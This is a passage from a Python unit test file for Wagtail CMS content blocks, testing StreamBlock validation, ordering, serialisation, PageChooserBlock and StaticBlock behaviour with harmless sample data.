block = ValidatedBlock(min_num=1)
value = blocks.StreamValue(block, [])
with self.assertRaises(ValidationError) as catcher:
block.clean(value)
self.assertEqual(catcher.exception.params, {
'__all__': ['The minimum number of items is 1']
})
# a value with >= 1 blocks should pass validation
value = blocks.StreamValue(block, [('char', 'foo')])
self.assertTrue(block.clean(value))
def test_max_num_validation_errors(self):
class ValidatedBlock(blocks.StreamBlock):
char = blocks.CharBlock()
url = blocks.URLBlock()
block = ValidatedBlock(max_num=1)
value = blocks.StreamValue(block, [
('char', 'foo'),
('char', 'foo'),
('url', 'http://example.com/'),
('url', 'http://example.com/'),
])
with self.assertRaises(ValidationError) as catcher:
block.clean(value)
self.assertEqual(catcher.exception.params, {
'__all__': ['The maximum number of items is 1']
})
# a value with 1 block should pass validation
value = blocks.StreamValue(block, [('char', 'foo')])
self.assertTrue(block.clean(value))
def test_block_counts_min_validation_errors(self):
class ValidatedBlock(blocks.StreamBlock):
char = blocks.CharBlock()
url = blocks.URLBlock()
block = ValidatedBlock(block_counts={'char': {'min_num': 1}})
value = blocks.StreamValue(block, [
('url', 'http://example.com/'),
('url', 'http://example.com/'),
])
with self.assertRaises(ValidationError) as catcher:
block.clean(value)
self.assertEqual(catcher.exception.params, {
'__all__': ['Char: The minimum number of items is 1']
})
# a value with 1 char block should pass validation
value = blocks.StreamValue(block, [
('url', 'http://example.com/'),
('char', 'foo'),
('url', 'http://example.com/'),
])
self.assertTrue(block.clean(value))
def test_block_counts_max_validation_errors(self):
class ValidatedBlock(blocks.StreamBlock):
char = blocks.CharBlock()
url = blocks.URLBlock()
block = ValidatedBlock(block_counts={'char': {'max_num': 1}})
value = blocks.StreamValue(block, [
('char', 'foo'),
('char', 'foo'),
('url', 'http://example.com/'),
('url', 'http://example.com/'),
])
with self.assertRaises(ValidationError) as catcher:
block.clean(value)
self.assertEqual(catcher.exception.params, {
'__all__': ['Char: The maximum number of items is 1']
})
# a value with 1 char block should pass validation
value = blocks.StreamValue(block, [
('char', 'foo'),
('url', 'http://example.com/'),
('url', 'http://example.com/'),
])
self.assertTrue(block.clean(value))
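# Illustrative note: StreamBlock validation errors are keyed in exception.params by the
# index of the offending child, while whole-stream problems (min_num, max_num,
# block_counts) are reported under the '__all__' key, as the assertions above show.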
def test_block_level_validation_renders_errors(self):
block = FooStreamBlock()
post_data = {'stream-count': '2'}
for i, value in enumerate(['bar', 'baz']):
post_data.update({
'stream-%d-deleted' % i: '',
'stream-%d-order' % i: str(i),
'stream-%d-type' % i: 'text',
'stream-%d-value' % i: value,
})
block_value = block.value_from_datadict(post_data, {}, 'stream')
with self.assertRaises(ValidationError) as catcher:
block.clean(block_value)
errors = ErrorList([
catcher.exception
])
self.assertInHTML(
format_html('<div class="help-block help-critical">{}</div>', FooStreamBlock.error),
block.render_form(block_value, prefix='stream', errors=errors))
def test_block_level_validation_render_no_errors(self):
block = FooStreamBlock()
post_data = {'stream-count': '3'}
for i, value in enumerate(['foo', 'bar', 'baz']):
post_data.update({
'stream-%d-deleted' % i: '',
'stream-%d-order' % i: str(i),
'stream-%d-type' % i: 'text',
'stream-%d-value' % i: value,
})
block_value = block.value_from_datadict(post_data, {}, 'stream')
try:
block.clean(block_value)
except ValidationError:
self.fail('Should have passed validation')
self.assertInHTML(
format_html('<div class="help-block help-critical">{}</div>', FooStreamBlock.error),
block.render_form(block_value, prefix='stream'),
count=0)
def test_html_declarations(self):
class ArticleBlock(blocks.StreamBlock):
heading = blocks.CharBlock()
paragraph = blocks.CharBlock()
block = ArticleBlock()
html = block.html_declarations()
self.assertTagInTemplateScript('<input type="hidden" id="__PREFIX__-id" name="__PREFIX__-id" value="" />', html)
self.assertTagInTemplateScript('<input type="hidden" id="__PREFIX__-type" name="__PREFIX__-type" value="heading" />', html)
self.assertTagInTemplateScript('<input id="__PREFIX__-value" name="__PREFIX__-value" placeholder="Heading" type="text" />', html)
self.assertTagInTemplateScript(
'<input id="__PREFIX__-value" name="__PREFIX__-value" placeholder="Paragraph" type="text" />',
html
)
def test_html_declarations_uses_default(self):
class ArticleBlock(blocks.StreamBlock):
heading = blocks.CharBlock(default="Fish found on moon")
paragraph = blocks.CharBlock(default="Lorem ipsum dolor sit amet")
block = ArticleBlock()
html = block.html_declarations()
self.assertTagInTemplateScript(
(
'<input id="__PREFIX__-value" name="__PREFIX__-value" placeholder="Heading"'
' type="text" value="Fish found on moon" />'
),
html
)
self.assertTagInTemplateScript(
(
'<input id="__PREFIX__-value" name="__PREFIX__-value" placeholder="Paragraph" type="text"'
' value="Lorem ipsum dolor sit amet" />'
),
html
)
def test_media_inheritance(self):
class ScriptedCharBlock(blocks.CharBlock):
media = forms.Media(js=['scripted_char_block.js'])
class ArticleBlock(blocks.StreamBlock):
heading = ScriptedCharBlock()
paragraph = blocks.CharBlock()
block = ArticleBlock()
self.assertIn('scripted_char_block.js', ''.join(block.all_media().render_js()))
def test_html_declaration_inheritance(self):
class CharBlockWithDeclarations(blocks.CharBlock):
def html_declarations(self):
return '<script type="text/x-html-template">hello world</script>'
class ArticleBlock(blocks.StreamBlock):
heading = CharBlockWithDeclarations(default="Torchbox")
paragraph = blocks.CharBlock()
block = ArticleBlock()
self.assertIn('<script type="text/x-html-template">hello world</script>', block.all_html_declarations())
def test_ordering_in_form_submission_uses_order_field(self):
class ArticleBlock(blocks.StreamBlock):
heading = blocks.CharBlock()
paragraph = blocks.CharBlock()
block = ArticleBlock()
# check that items are ordered by the 'order' field, not the order they appear in the form
post_data = {'article-count': '3'}
for i in range(0, 3):
post_data.update({
'article-%d-deleted' % i: '',
'article-%d-order' % i: str(2 - i),
'article-%d-type' % i: 'heading',
'article-%d-value' % i: "heading %d" % i,
'article-%d-id' % i: "000%d" % i,
})
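        # With order set to 2 - i, the first form item should come back last once
        # value_from_datadict sorts the submitted items by their 'order' field.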
block_value = block.value_from_datadict(post_data, {}, 'article')
self.assertEqual(block_value[2].value, "heading 0")
self.assertEqual(block_value[2].id, "0000")
def test_ordering_in_form_submission_is_numeric(self):
class ArticleBlock(blocks.StreamBlock):
heading = blocks.CharBlock()
paragraph = blocks.CharBlock()
block = ArticleBlock()
# check that items are ordered by 'order' numerically, not alphabetically
post_data = {'article-count': '12'}
for i in range(0, 12):
post_data.update({
'article-%d-deleted' % i: '',
'article-%d-order' % i: str(i),
'article-%d-type' % i: 'heading',
'article-%d-value' % i: "heading %d" % i
})
block_value = block.value_from_datadict(post_data, {}, 'article')
self.assertEqual(block_value[2].value, "heading 2")
def test_searchable_content(self):
class ArticleBlock(blocks.StreamBlock):
heading = blocks.CharBlock()
paragraph = blocks.CharBlock()
block = ArticleBlock()
value = block.to_python([
{
'type': 'heading',
'value': "My title",
},
{
'type': 'paragraph',
'value': 'My first paragraph',
},
{
'type': 'paragraph',
'value': 'My second paragraph',
},
])
content = block.get_searchable_content(value)
self.assertEqual(content, [
"My title",
"My first paragraph",
"My second paragraph",
])
def test_meta_default(self):
"""Test that we can specify a default value in the Meta of a StreamBlock"""
class ArticleBlock(blocks.StreamBlock):
heading = blocks.CharBlock()
paragraph = blocks.CharBlock()
class Meta:
default = [('heading', 'A default heading')]
# to access the default value, we retrieve it through a StructBlock
# from a struct value that's missing that key
class ArticleContainerBlock(blocks.StructBlock):
author = blocks.CharBlock()
article = ArticleBlock()
block = ArticleContainerBlock()
struct_value = block.to_python({'author': 'Bob'})
stream_value = struct_value['article']
self.assertTrue(isinstance(stream_value, blocks.StreamValue))
self.assertEqual(len(stream_value), 1)
self.assertEqual(stream_value[0].block_type, 'heading')
self.assertEqual(stream_value[0].value, 'A default heading')
def test_constructor_default(self):
"""Test that we can specify a default value in the constructor of a StreamBlock"""
class ArticleBlock(blocks.StreamBlock):
heading = blocks.CharBlock()
paragraph = blocks.CharBlock()
class Meta:
default = [('heading', 'A default heading')]
# to access the default value, we retrieve it through a StructBlock
# from a struct value that's missing that key
class ArticleContainerBlock(blocks.StructBlock):
author = blocks.CharBlock()
article = ArticleBlock(default=[('heading', 'A different default heading')])
block = ArticleContainerBlock()
struct_value = block.to_python({'author': 'Bob'})
stream_value = struct_value['article']
self.assertTrue(isinstance(stream_value, blocks.StreamValue))
self.assertEqual(len(stream_value), 1)
self.assertEqual(stream_value[0].block_type, 'heading')
self.assertEqual(stream_value[0].value, 'A different default heading')
def test_stream_value_equality(self):
block = blocks.StreamBlock([
('text', blocks.CharBlock()),
])
value1 = block.to_python([{'type': 'text', 'value': 'hello'}])
value2 = block.to_python([{'type': 'text', 'value': 'hello'}])
value3 = block.to_python([{'type': 'text', 'value': 'goodbye'}])
self.assertTrue(value1 == value2)
self.assertFalse(value1 != value2)
self.assertFalse(value1 == value3)
self.assertTrue(value1 != value3)
def test_render_considers_group_attribute(self):
"""If group attributes are set in Block Meta classes, render a <h4> for each different block"""
class Group1Block1(blocks.CharBlock):
class Meta:
group = 'group1'
class Group1Block2(blocks.CharBlock):
class Meta:
group = 'group1'
class Group2Block1(blocks.CharBlock):
class Meta:
group = 'group2'
class Group2Block2(blocks.CharBlock):
class Meta:
group = 'group2'
class NoGroupBlock(blocks.CharBlock):
pass
block = blocks.StreamBlock([
('b1', Group1Block1()),
('b2', Group1Block2()),
('b3', Group2Block1()),
('b4', Group2Block2()),
('ngb', NoGroupBlock()),
])
html = block.render_form('')
        self.assertNotIn('<h4 class="c-sf-add-panel__group-title"></h4>', html)
self.assertIn('<h4 class="c-sf-add-panel__group-title">group1</h4>', html)
self.assertIn('<h4 class="c-sf-add-panel__group-title">group2</h4>', html)
def test_value_from_datadict(self):
class ArticleBlock(blocks.StreamBlock):
heading = blocks.CharBlock()
paragraph = blocks.CharBlock()
block = ArticleBlock()
value = block.value_from_datadict({
'foo-count': '3',
'foo-0-deleted': '',
'foo-0-order': '2',
'foo-0-type': 'heading',
'foo-0-id': '0000',
'foo-0-value': 'this is my heading',
'foo-1-deleted': '1',
'foo-1-order': '1',
'foo-1-type': 'heading',
'foo-1-id': '0001',
'foo-1-value': 'a deleted heading',
'foo-2-deleted': '',
'foo-2-order': '0',
'foo-2-type': 'paragraph',
'foo-2-id': '',
'foo-2-value': '<p>this is a paragraph</p>',
}, {}, prefix='foo')
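        # Item 1 is flagged as deleted and should be dropped; the remaining items
        # should come back sorted by their 'order' values (the paragraph first).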
self.assertEqual(len(value), 2)
self.assertEqual(value[0].block_type, 'paragraph')
self.assertEqual(value[0].id, '')
self.assertEqual(value[0].value, '<p>this is a paragraph</p>')
self.assertEqual(value[1].block_type, 'heading')
self.assertEqual(value[1].id, '0000')
self.assertEqual(value[1].value, 'this is my heading')
def check_get_prep_value(self, stream_data, is_lazy):
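        """
        Shared helper: whether stream_data is given as (type, value[, id]) tuples
        (is_lazy=False) or as raw dicts (is_lazy=True), get_prep_value should
        produce the same JSON-serialisable output.
        """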
class ArticleBlock(blocks.StreamBlock):
heading = blocks.CharBlock()
paragraph = blocks.CharBlock()
block = ArticleBlock()
value = blocks.StreamValue(block, stream_data, is_lazy=is_lazy)
jsonish_value = block.get_prep_value(value)
self.assertEqual(len(jsonish_value), 2)
self.assertEqual(jsonish_value[0], {'type': 'heading', 'value': 'this is my heading', 'id': '0000'})
self.assertEqual(jsonish_value[1]['type'], 'paragraph')
self.assertEqual(jsonish_value[1]['value'], '<p>this is a paragraph</p>')
# get_prep_value should assign a new (random and non-empty)
# ID to this block, as it didn't have one already.
self.assertTrue(jsonish_value[1]['id'])
# Calling get_prep_value again should preserve existing IDs, including the one
# just assigned to block 1
jsonish_value_again = block.get_prep_value(value)
self.assertEqual(jsonish_value[0]['id'], jsonish_value_again[0]['id'])
self.assertEqual(jsonish_value[1]['id'], jsonish_value_again[1]['id'])
def test_get_prep_value_not_lazy(self):
stream_data = [
('heading', 'this is my heading', '0000'),
('paragraph', '<p>this is a paragraph</p>')
]
self.check_get_prep_value(stream_data, is_lazy=False)
def test_get_prep_value_is_lazy(self):
stream_data = [
{'type': 'heading', 'value': 'this is my heading', 'id': '0000'},
{'type': 'paragraph', 'value': '<p>this is a paragraph</p>'},
]
self.check_get_prep_value(stream_data, is_lazy=True)
def check_get_prep_value_nested_streamblocks(self, stream_data, is_lazy):
class TwoColumnBlock(blocks.StructBlock):
left = blocks.StreamBlock([('text', blocks.CharBlock())])
right = blocks.StreamBlock([('text', blocks.CharBlock())])
block = TwoColumnBlock()
value = {
k: blocks.StreamValue(block.child_blocks[k], v, is_lazy=is_lazy)
for k, v in stream_data.items()
}
jsonish_value = block.get_prep_value(value)
self.assertEqual(len(jsonish_value), 2)
self.assertEqual(
jsonish_value['left'],
[{'type': 'text', 'value': 'some text', 'id': '0000'}]
)
self.assertEqual(len(jsonish_value['right']), 1)
right_block = jsonish_value['right'][0]
self.assertEqual(right_block['type'], 'text')
self.assertEqual(right_block['value'], 'some other text')
# get_prep_value should assign a new (random and non-empty)
# ID to this block, as it didn't have one already.
self.assertTrue(right_block['id'])
def test_get_prep_value_nested_streamblocks_not_lazy(self):
stream_data = {
'left': [('text', 'some text', '0000')],
'right': [('text', 'some other text')],
}
self.check_get_prep_value_nested_streamblocks(stream_data, is_lazy=False)
def test_get_prep_value_nested_streamblocks_is_lazy(self):
stream_data = {
'left': [{
'type': 'text',
'value': 'some text',
'id': '0000',
}],
'right': [{
'type': 'text',
'value': 'some other text',
}],
}
self.check_get_prep_value_nested_streamblocks(stream_data, is_lazy=True)
def test_modifications_to_stream_child_id_are_saved(self):
class ArticleBlock(blocks.StreamBlock):
heading = blocks.CharBlock()
paragraph = blocks.CharBlock()
block = ArticleBlock()
stream = block.to_python([
{'type': 'heading', 'value': 'hello', 'id': '0001'},
{'type': 'paragraph', 'value': 'world', 'id': '0002'},
])
stream[1].id = '0003'
raw_data = block.get_prep_value(stream)
self.assertEqual(raw_data, [
{'type': 'heading', 'value': 'hello', 'id': '0001'},
{'type': 'paragraph', 'value': 'world', 'id': '0003'},
])
def test_modifications_to_stream_child_value_are_saved(self):
class ArticleBlock(blocks.StreamBlock):
heading = blocks.CharBlock()
paragraph = blocks.CharBlock()
block = ArticleBlock()
stream = block.to_python([
{'type': 'heading', 'value': 'hello', 'id': '0001'},
{'type': 'paragraph', 'value': 'world', 'id': '0002'},
])
stream[1].value = 'earth'
raw_data = block.get_prep_value(stream)
self.assertEqual(raw_data, [
{'type': 'heading', 'value': 'hello', 'id': '0001'},
{'type': 'paragraph', 'value': 'earth', 'id': '0002'},
])
def test_set_streamvalue_item(self):
class ArticleBlock(blocks.StreamBlock):
heading = blocks.CharBlock()
paragraph = blocks.CharBlock()
block = ArticleBlock()
stream = block.to_python([
{'type': 'heading', 'value': 'hello', 'id': '0001'},
{'type': 'paragraph', 'value': 'world', 'id': '0002'},
])
stream[1] = ('heading', 'goodbye', '0003')
raw_data = block.get_prep_value(stream)
self.assertEqual(raw_data, [
{'type': 'heading', 'value': 'hello', 'id': '0001'},
{'type': 'heading', 'value': 'goodbye', 'id': '0003'},
])
def test_delete_streamvalue_item(self):
class ArticleBlock(blocks.StreamBlock):
heading = blocks.CharBlock()
paragraph = blocks.CharBlock()
block = ArticleBlock()
stream = block.to_python([
{'type': 'heading', 'value': 'hello', 'id': '0001'},
{'type': 'paragraph', 'value': 'world', 'id': '0002'},
])
del stream[0]
raw_data = block.get_prep_value(stream)
self.assertEqual(raw_data, [
{'type': 'paragraph', 'value': 'world', 'id': '0002'},
])
def test_insert_streamvalue_item(self):
class ArticleBlock(blocks.StreamBlock):
heading = blocks.CharBlock()
paragraph = blocks.CharBlock()
block = ArticleBlock()
stream = block.to_python([
{'type': 'heading', 'value': 'hello', 'id': '0001'},
{'type': 'paragraph', 'value': 'world', 'id': '0002'},
])
stream.insert(1, ('paragraph', 'mutable', '0003'))
raw_data = block.get_prep_value(stream)
self.assertEqual(raw_data, [
{'type': 'heading', 'value': 'hello', 'id': '0001'},
{'type': 'paragraph', 'value': 'mutable', 'id': '0003'},
{'type': 'paragraph', 'value': 'world', 'id': '0002'},
])
def test_append_streamvalue_item(self):
class ArticleBlock(blocks.StreamBlock):
heading = blocks.CharBlock()
paragraph = blocks.CharBlock()
block = ArticleBlock()
stream = block.to_python([
{'type': 'heading', 'value': 'hello', 'id': '0001'},
{'type': 'paragraph', 'value': 'world', 'id': '0002'},
])
stream.append(('paragraph', 'of warcraft', '0003'))
raw_data = block.get_prep_value(stream)
self.assertEqual(raw_data, [
{'type': 'heading', 'value': 'hello', 'id': '0001'},
{'type': 'paragraph', 'value': 'world', 'id': '0002'},
{'type': 'paragraph', 'value': 'of warcraft', 'id': '0003'},
])
def test_streamvalue_raw_data(self):
class ArticleBlock(blocks.StreamBlock):
heading = blocks.CharBlock()
paragraph = blocks.CharBlock()
block = ArticleBlock()
stream = block.to_python([
{'type': 'heading', 'value': 'hello', 'id': '0001'},
{'type': 'paragraph', 'value': 'world', 'id': '0002'},
])
self.assertEqual(stream.raw_data[0], {'type': 'heading', 'value': 'hello', 'id': '0001'})
stream.raw_data[0]['value'] = 'bonjour'
self.assertEqual(stream.raw_data[0], {'type': 'heading', 'value': 'bonjour', 'id': '0001'})
# changes to raw_data will be written back via get_prep_value...
raw_data = block.get_prep_value(stream)
self.assertEqual(raw_data, [
{'type': 'heading', 'value': 'bonjour', 'id': '0001'},
{'type': 'paragraph', 'value': 'world', 'id': '0002'},
])
# ...but once the bound-block representation has been accessed, that takes precedence
self.assertEqual(stream[0].value, 'bonjour')
stream.raw_data[0]['value'] = 'guten tag'
self.assertEqual(stream.raw_data[0]['value'], 'guten tag')
self.assertEqual(stream[0].value, 'bonjour')
raw_data = block.get_prep_value(stream)
self.assertEqual(raw_data, [
{'type': 'heading', 'value': 'bonjour', 'id': '0001'},
{'type': 'paragraph', 'value': 'world', 'id': '0002'},
])
# Replacing a raw_data entry outright will propagate to the bound block, though
stream.raw_data[0] = {'type': 'heading', 'value': 'konnichiwa', 'id': '0003'}
raw_data = block.get_prep_value(stream)
self.assertEqual(raw_data, [
{'type': 'heading', 'value': 'konnichiwa', 'id': '0003'},
{'type': 'paragraph', 'value': 'world', 'id': '0002'},
])
self.assertEqual(stream[0].value, 'konnichiwa')
# deletions / insertions on raw_data will also propagate to the bound block representation
del stream.raw_data[1]
stream.raw_data.insert(0, {'type': 'paragraph', 'value': 'hello kitty says', 'id': '0004'})
raw_data = block.get_prep_value(stream)
self.assertEqual(raw_data, [
{'type': 'paragraph', 'value': 'hello kitty says', 'id': '0004'},
{'type': 'heading', 'value': 'konnichiwa', 'id': '0003'},
])
def test_render_with_classname_via_kwarg(self):
"""form_classname from kwargs to be used as an additional class when rendering stream block"""
block = blocks.StreamBlock([
(b'heading', blocks.CharBlock()),
(b'paragraph', blocks.CharBlock()),
], form_classname='rocket-section')
value = block.to_python([
{
'type': 'heading',
'value': "Falcon Heavy",
'id': '2',
},
{
'type': 'paragraph',
'value': "Ultra heavy launch capability",
'id': '3',
}
])
html = block.render_form(value)
# including leading space to ensure class name gets added correctly
self.assertEqual(html.count(' rocket-section'), 1)
def test_render_with_classname_via_class_meta(self):
"""form_classname from meta to be used as an additional class when rendering stream block"""
class ProfileBlock(blocks.StreamBlock):
username = blocks.CharBlock()
class Meta:
form_classname = 'profile-block-large'
block = ProfileBlock()
value = block.to_python([
{
'type': 'username',
'value': "renegadeM@ster",
'id': '789',
}
])
html = block.render_form(value, prefix='profiles')
# including leading space to ensure class name gets added correctly
self.assertEqual(html.count(' profile-block-large'), 1)
class TestStructBlockWithFixtures(TestCase):
fixtures = ['test.json']
def test_bulk_to_python(self):
page_link_block = blocks.StructBlock([
('page', blocks.PageChooserBlock(required=False)),
('link_text', blocks.CharBlock(default="missing title")),
])
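        # All three page lookups (ids 2, 3 and 4) should be batched into a single query.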
with self.assertNumQueries(1):
result = page_link_block.bulk_to_python([
{'page': 2, 'link_text': 'page two'},
{'page': 3, 'link_text': 'page three'},
{'page': None, 'link_text': 'no page'},
{'page': 4},
])
result_types = [type(val) for val in result]
self.assertEqual(result_types, [blocks.StructValue] * 4)
result_titles = [val['link_text'] for val in result]
self.assertEqual(result_titles, ['page two', 'page three', 'no page', 'missing title'])
result_pages = [val['page'] for val in result]
self.assertEqual(result_pages, [
Page.objects.get(id=2), Page.objects.get(id=3), None, Page.objects.get(id=4)
])
class TestStreamBlockWithFixtures(TestCase):
fixtures = ['test.json']
def test_bulk_to_python(self):
stream_block = blocks.StreamBlock([
('page', blocks.PageChooserBlock()),
('heading', blocks.CharBlock()),
])
# The naive implementation of bulk_to_python (calling to_python on each item) would perform
# NO queries, as StreamBlock.to_python returns a lazy StreamValue that only starts calling
# to_python on its children (and thus triggering DB queries) when its items are accessed.
# This is a good thing for a standalone to_python call, because loading a model instance
# with a StreamField in it will immediately call StreamField.to_python which in turn calls
# to_python on the top-level StreamBlock, and we really don't want
# SomeModelWithAStreamField.objects.get(id=1) to immediately trigger a cascading fetch of
# all objects referenced in the StreamField.
#
# However, for bulk_to_python that's bad, as it means each stream in the list would end up
# doing its own object lookups in isolation, missing the opportunity to group them together
# into a single call to the child block's bulk_to_python. Therefore, the ideal outcome is
# that we perform one query now (covering all PageChooserBlocks across all streams),
# returning a list of non-lazy StreamValues.
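        #
        # For illustration only (not part of the implementation under test), the naive
        # version described above would look roughly like:
        #
        #     def bulk_to_python(self, values):
        #         return [self.to_python(value) for value in values]
        #
        # i.e. each stream would defer its own page lookups until it is iterated.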
with self.assertNumQueries(1):
results = stream_block.bulk_to_python([
[{'type': 'heading', 'value': 'interesting pages'}, {'type': 'page', 'value': 2}, {'type': 'page', 'value': 3}],
[{'type': 'heading', 'value': 'pages written by dogs'}, {'type': 'woof', 'value': 'woof woof'}],
[{'type': 'heading', 'value': 'boring pages'}, {'type': 'page', 'value': 4}],
])
# If bulk_to_python has indeed given us non-lazy StreamValues, then no further queries
# should be performed when iterating over its child blocks.
with self.assertNumQueries(0):
block_types = [
[block.block_type for block in stream]
for stream in results
]
self.assertEqual(block_types, [
['heading', 'page', 'page'],
['heading'],
['heading', 'page'],
])
with self.assertNumQueries(0):
block_values = [
[block.value for block in stream]
for stream in results
]
self.assertEqual(block_values, [
['interesting pages', Page.objects.get(id=2), Page.objects.get(id=3)],
['pages written by dogs'],
['boring pages', Page.objects.get(id=4)],
])
class TestPageChooserBlock(TestCase):
fixtures = ['test.json']
def test_serialize(self):
"""The value of a PageChooserBlock (a Page object) should serialize to an ID"""
block = blocks.PageChooserBlock()
christmas_page = Page.objects.get(slug='christmas')
self.assertEqual(block.get_prep_value(christmas_page), christmas_page.id)
# None should serialize to None
self.assertEqual(block.get_prep_value(None), None)
def test_deserialize(self):
"""The serialized value of a PageChooserBlock (an ID) should deserialize to a Page object"""
block = blocks.PageChooserBlock()
christmas_page = Page.objects.get(slug='christmas')
self.assertEqual(block.to_python(christmas_page.id), christmas_page)
# None should deserialize to None
self.assertEqual(block.to_python(None), None)
def test_form_render(self):
block = blocks.PageChooserBlock(help_text="pick a page, any page")
empty_form_html = block.render_form(None, 'page')
self.assertInHTML('<input id="page" name="page" placeholder="" type="hidden" />', empty_form_html)
self.assertIn('createPageChooser("page", ["wagtailcore.page"], null, false, null);', empty_form_html)
christmas_page = Page.objects.get(slug='christmas')
christmas_form_html = block.render_form(christmas_page, 'page')
expected_html = '<input id="page" name="page" placeholder="" type="hidden" value="%d" />' % christmas_page.id
self.assertInHTML(expected_html, christmas_form_html)
self.assertIn("pick a page, any page", christmas_form_html)
def test_form_render_with_target_model_default(self):
block = blocks.PageChooserBlock()
empty_form_html = block.render_form(None, 'page')
self.assertIn('createPageChooser("page", ["wagtailcore.page"], null, false, null);', empty_form_html)
def test_form_render_with_target_model_string(self):
block = blocks.PageChooserBlock(help_text="pick a page, any page", page_type='tests.SimplePage')
empty_form_html = block.render_form(None, 'page')
self.assertIn('createPageChooser("page", ["tests.simplepage"], null, false, null);', empty_form_html)
def test_form_render_with_target_model_literal(self):
block = blocks.PageChooserBlock(help_text="pick a page, any page", page_type=SimplePage)
empty_form_html = block.render_form(None, 'page')
self.assertIn('createPageChooser("page", ["tests.simplepage"], null, false, null);', empty_form_html)
def test_form_render_with_target_model_multiple_strings(self):
block = blocks.PageChooserBlock(help_text="pick a page, any page", page_type=['tests.SimplePage', 'tests.EventPage'])
empty_form_html = block.render_form(None, 'page')
self.assertIn('createPageChooser("page", ["tests.simplepage", "tests.eventpage"], null, false, null);', empty_form_html)
def test_form_render_with_target_model_multiple_literals(self):
block = blocks.PageChooserBlock(help_text="pick a page, any page", page_type=[SimplePage, EventPage])
empty_form_html = block.render_form(None, 'page')
self.assertIn('createPageChooser("page", ["tests.simplepage", "tests.eventpage"], null, false, null);', empty_form_html)
def test_form_render_with_can_choose_root(self):
block = blocks.PageChooserBlock(help_text="pick a page, any page", can_choose_root=True)
empty_form_html = block.render_form(None, 'page')
self.assertIn('createPageChooser("page", ["wagtailcore.page"], null, true, null);', empty_form_html)
def test_form_response(self):
block = blocks.PageChooserBlock()
christmas_page = Page.objects.get(slug='christmas')
value = block.value_from_datadict({'page': str(christmas_page.id)}, {}, 'page')
self.assertEqual(value, christmas_page)
empty_value = block.value_from_datadict({'page': ''}, {}, 'page')
self.assertEqual(empty_value, None)
def test_clean(self):
required_block = blocks.PageChooserBlock()
nonrequired_block = blocks.PageChooserBlock(required=False)
christmas_page = Page.objects.get(slug='christmas')
self.assertEqual(required_block.clean(christmas_page), christmas_page)
with self.assertRaises(ValidationError):
required_block.clean(None)
self.assertEqual(nonrequired_block.clean(christmas_page), christmas_page)
self.assertEqual(nonrequired_block.clean(None), None)
def test_target_model_default(self):
block = blocks.PageChooserBlock()
self.assertEqual(block.target_model, Page)
def test_target_model_string(self):
block = blocks.PageChooserBlock(page_type='tests.SimplePage')
self.assertEqual(block.target_model, SimplePage)
def test_target_model_literal(self):
block = blocks.PageChooserBlock(page_type=SimplePage)
self.assertEqual(block.target_model, SimplePage)
def test_target_model_multiple_strings(self):
block = blocks.PageChooserBlock(page_type=['tests.SimplePage', 'tests.EventPage'])
self.assertEqual(block.target_model, Page)
def test_target_model_multiple_literals(self):
block = blocks.PageChooserBlock(page_type=[SimplePage, EventPage])
self.assertEqual(block.target_model, Page)
def test_deconstruct_target_model_default(self):
block = blocks.PageChooserBlock()
self.assertEqual(block.deconstruct(), (
'wagtail.core.blocks.PageChooserBlock',
(), {}))
def test_deconstruct_target_model_string(self):
block = blocks.PageChooserBlock(page_type='tests.SimplePage')
self.assertEqual(block.deconstruct(), (
'wagtail.core.blocks.PageChooserBlock',
(), {'page_type': ['tests.SimplePage']}))
def test_deconstruct_target_model_literal(self):
block = blocks.PageChooserBlock(page_type=SimplePage)
self.assertEqual(block.deconstruct(), (
'wagtail.core.blocks.PageChooserBlock',
(), {'page_type': ['tests.SimplePage']}))
def test_deconstruct_target_model_multiple_strings(self):
block = blocks.PageChooserBlock(page_type=['tests.SimplePage', 'tests.EventPage'])
self.assertEqual(block.deconstruct(), (
'wagtail.core.blocks.PageChooserBlock',
(), {'page_type': ['tests.SimplePage', 'tests.EventPage']}))
def test_deconstruct_target_model_multiple_literals(self):
block = blocks.PageChooserBlock(page_type=[SimplePage, EventPage])
self.assertEqual(block.deconstruct(), (
'wagtail.core.blocks.PageChooserBlock',
(), {'page_type': ['tests.SimplePage', 'tests.EventPage']}))
def test_bulk_to_python(self):
page_ids = [2, 3, 4, 5]
expected_pages = Page.objects.filter(pk__in=page_ids)
block = blocks.PageChooserBlock()
with self.assertNumQueries(1):
pages = block.bulk_to_python(page_ids)
self.assertSequenceEqual(pages, expected_pages)
class TestStaticBlock(unittest.TestCase):
def test_render_form_with_constructor(self):
block = blocks.StaticBlock(
admin_text="Latest posts - This block doesn't need to be configured, it will be displayed automatically",
template='tests/blocks/posts_static_block.html')
rendered_html = block.render_form(None)
self.assertEqual(rendered_html, "Latest posts - This block doesn't need to be configured, it will be displayed automatically")
def test_render_form_with_subclass(self):
class PostsStaticBlock(blocks.StaticBlock):
class Meta:
admin_text = "Latest posts - This block doesn't need to be configured, it will be displayed automatically"
template = "tests/blocks/posts_static_block.html"
block = PostsStaticBlock()
rendered_html = block.render_form(None)
self.assertEqual(rendered_html, "Latest posts - This block doesn't need to be configured, it will be displayed automatically")
def test_render_form_with_subclass_displays_default_text_if_no_admin_text(self):
class LabelOnlyStaticBlock(blocks.StaticBlock):
class Meta:
label = "Latest posts"
block = LabelOnlyStaticBlock()
rendered_html = block.render_form(None)
self.assertEqual(rendered_html, "Latest posts: this block has no options.")
def test_render_form_with_subclass_displays_default_text_if_no_admin_text_and_no_label(self):
class NoMetaStaticBlock(blocks.StaticBlock):
pass
block = NoMetaStaticBlock()
rendered_html = block.render_form(None)
self.assertEqual(rendered_html, "This block has no options.")
def test_render_form_works_with_mark_safe(self):
block = blocks.StaticBlock(
admin_text=mark_safe("<b>Latest posts</b> - This block doesn't need to be configured, it will be displayed automatically"),
template='tests/blocks/posts_static_block.html')
rendered_html = block.render_form(None)
self.assertEqual(rendered_html, "<b>Latest posts</b> - This block doesn't need to be configured, it will be displayed automatically")
def test_get_default(self):
block = blocks.StaticBlock()
default_value = block.get_default()
self.assertEqual(default_value, None)
def test_render(self):
block = blocks.StaticBlock(template='tests/blocks/posts_static_block.html')
result = block.render(None)
self.assertEqual(result, '<p>PostsStaticBlock template</p>')
def test_serialize(self):
block = blocks.StaticBlock()
result = block.get_prep_value(None)
self.assertEqual(result, None)
def test_deserialize(self):
block = blocks.StaticBlock()
result = block.to_python(None)
self.assertEqual(result, None)
class TestDateBlock(TestCase):
def test_render_form(self):
block = blocks.DateBlock()
value = date(2015, 8, 13)
result = block.render_form(value, prefix='dateblock')
# we should see the JS initialiser code:
# <script>initDateChooser("dateblock", {"dayOfWeekStart": 0, "format": "Y-m-d"});</script>
# except that we can't predict the order of the config options
